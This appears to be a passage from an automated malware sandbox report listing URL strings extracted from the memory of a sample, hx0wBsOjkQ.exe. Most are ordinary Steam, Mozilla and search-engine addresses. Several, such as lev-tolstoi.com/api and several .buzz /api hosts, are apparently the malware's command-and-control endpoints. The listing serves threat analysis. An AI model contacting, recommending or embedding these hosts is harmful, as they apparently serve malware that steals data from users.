                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1517261667.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1517261667.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1592981595.00000000057D3000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1591591909.00000000057D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1592981595.00000000057D3000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1591591909.00000000057D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1599230927.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1626918311.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cashfuzysao.buzz:443/api
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1626755261.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643372396.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1599170541.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643550627.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000002.1673905575.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1599605647.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1623931109.0000000000E5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/imag
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1517261667.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1592981595.00000000057D3000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1591591909.00000000057D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1592981595.00000000057D3000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1591591909.00000000057D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz:443/api
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1591591909.00000000057D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1593068809.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1566379520.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1599605647.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495521986.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495218913.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1623931109.0000000000E5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: hx0wBsOjkQ.exe, 00000000.00000002.1673905575.0000000000E61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/9
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495218913.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643372396.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1566708973.00000000057D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1567527406.00000000057D7000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1565923725.00000000057D4000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057D4000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1566708973.00000000057D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiaLxz
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1517343643.0000000000E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apill
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1517343643.0000000000E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apipt
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1672980605.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643550627.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000002.1673929346.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643372396.0000000000E72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apis
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/m/
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1626755261.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643372396.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643550627.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495521986.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495218913.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1623931109.0000000000E5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: hx0wBsOjkQ.exe, 00000000.00000002.1673905575.0000000000E61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piA
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1626918311.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: hx0wBsOjkQ.exe, 00000000.00000002.1673742160.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1599230927.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1672776832.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1626918311.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apirofiles/76561199724331900
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://prisonyfork.buzz:443/apia
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scentniej.buzz:443/api
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
